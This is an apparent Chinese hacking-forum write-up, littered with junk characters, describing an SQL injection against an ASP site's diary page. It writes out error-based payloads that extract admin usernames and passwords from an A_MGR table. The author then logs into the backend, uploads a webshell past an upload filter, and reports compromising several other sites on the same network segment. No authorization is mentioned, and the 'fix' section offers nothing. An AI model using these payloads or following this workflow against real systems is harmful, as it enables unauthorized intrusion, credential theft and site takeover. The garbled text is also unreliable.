发现一个注入点
5 m( r7 F# n( yhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389$ I- Q, d' ?' r6 W2 Q! P4 h
' g# u2 v; r7 i习惯性的加’having1=1--
# C; z8 Z2 N i- z9 @+ P
/ g5 S# l. p+ O6 F ]http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—4 n9 M/ I1 Q! E. j7 A5 ?
6 N- x$ g" |5 F8 \. t/ I* K7 w
0& V6 |/ i4 |0 u+ G: I
. ^4 [" w% M2 |6 U# ` E
爆出Diary_A.dl_Title(这时候很激动啊)6 P* T Q6 `# R' \5 r& c
* g% t1 G* N; v# l7 L6 z8 }
那么继续
0 D- J% N" |+ `' shttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—! G' Q6 X, ^& s T( r' q
@ Y! f8 r ^% J# k6 |
继续,一直爆下去
( \4 K4 o6 _' x" s# v
: z8 t. @9 ^8 }) r. v: [, P爆到几个字段和表段 但是没找到需要的管理用户的字段7 V# b( q9 `9 ^* O* r
. o" T* q; a( Q; x& F, @蛋疼了 怎么办 然后去后台登陆页看源码2 n" }7 F6 e9 ]- R* J5 `0 T/ _& U& L+ F
$ s6 ^* V$ n- k- t) n n0
$ l1 r( Q! Q/ Z# ~: Y( m2 v
N9 C* U! Q- d5 l8 XInput name= “ADUID”
9 M( n- J6 M" C" s' P- s6 r( U* L' {Input name= “ADPWD”
6 |1 P, j5 x; g2 W/ B( @
1 C7 o j0 u* O0 p' V ~很幸运 找到了字段那就继续5 V7 W9 [( U: D; F
找到之后开始爆用户' {: G* o9 F4 w2 j3 q0 B" k
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
/ l8 i5 o# j$ [ w% R爆密码" J7 d# Z9 |' ~" [# a6 f
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0— j/ s2 R8 F! c5 P
测试了下 这个注入点只能爆到文章哪里的表 2 z/ Q$ @- N4 c% m* }. ]8 v
: Q! W: e, W/ r6 C/ j2 J9 H头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
1 Q1 }, \. R( m) F, W4 @) M; l8 P' W7 j" T, T2 d
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了$ \) n5 C% F: F9 a1 L1 o s
! }: P3 n' V4 N' b/ `" e& C# Y473( Q* G }* _/ R
- R$ ~0 ^1 z1 E. e5 I- E进后台: M* {4 c1 W3 Z' h4 D# A
" z1 _* q( \. r/ K5 { a+ e8 ^
* e1 l7 F( \6 e发现几个上传点 有的地方不能上传 而且防止恶意代码
+ P) v/ a% A) a/ {6 {/ V) b, B. _. T
没办法 各种百度各种找大牛 找到一只好像可以突破的马6 M; j- ]$ M8 }# V+ n+ `
# d% i1 H( G) i* X4 c$ A# N: x3 [/ F/ Y* L2 }$ @
在系统管理那里直接上传 不过没有显示地址
& w# i p3 L# V4 j2 _; b# T- Y% E' x: X D7 k' p1 e8 Q+ C2 H
再上传一次 抓包 搞定OK1 @6 x3 e8 {7 K% T
, N7 c; }4 P, A1 I- b) s( K. J
. o8 q- `- k# H
5 [3 a# l( g- L! ?# C4 k4722 O. ?+ E. X" O
! r" Z' Z2 l% `! v晚上不行了 去睡觉。。。" u0 i! U4 k7 L) @; B7 R5 b8 E# Z
第二天刚起床 闲的没事做继续日站吧 + ^, p9 E6 z0 E8 P6 I8 S9 d; f
' I. f/ B* n9 _: M( S0 R找个站 就把这个站的旁c扫了下
4 Z: c: W7 T- B! `0 U. D" K' w! W- W7 A3 z8 y5 Q: a3 K0 B- t4 u
发现c段也有一个购物站 ,然后还和这个站的模板差不多3 J. |" ~* w. h. E! W- o Y* Z1 C
; A! w3 t4 K5 v' f9 \# w2 i
就找到会员登录口测试
o% u8 @2 M1 W( V+ T% c# _0 p j5 _ U t" k! Q6 Q6 A
'and (select top 1 MGR_UID from A_MGR)>0—
$ v4 y* `3 U9 O$ @果断爆到了 这时候我很激动 通杀( e7 h l- H# z4 e% Q4 s
+ L6 u4 t! O T) c+ Z再次翻c段
! e) n A# I" J" g0 f2 {
2 d3 T* s, U/ D, _' M; E( b; `$ Q6 V翻出几个站 都成功拿下
6 a( N' c, e2 W6 `/ M3 z. X6 r- C" h# V/ g3 L
$ c* l( b6 B% t# a" o. \5 c' B
* @1 v% F% ^5 r; p e修复方案:0 ^) J! y8 K$ r6 B" {4 C
他们比我专业 6 S, i1 g6 Z$ p4 [2 l& Z1 `" x
0 D0 a( [! K2 p7 {9 c. v1 h$ H
! q% f7 y% U6 O# _4 d
7 ]: p: h0 m6 `" C: k- w |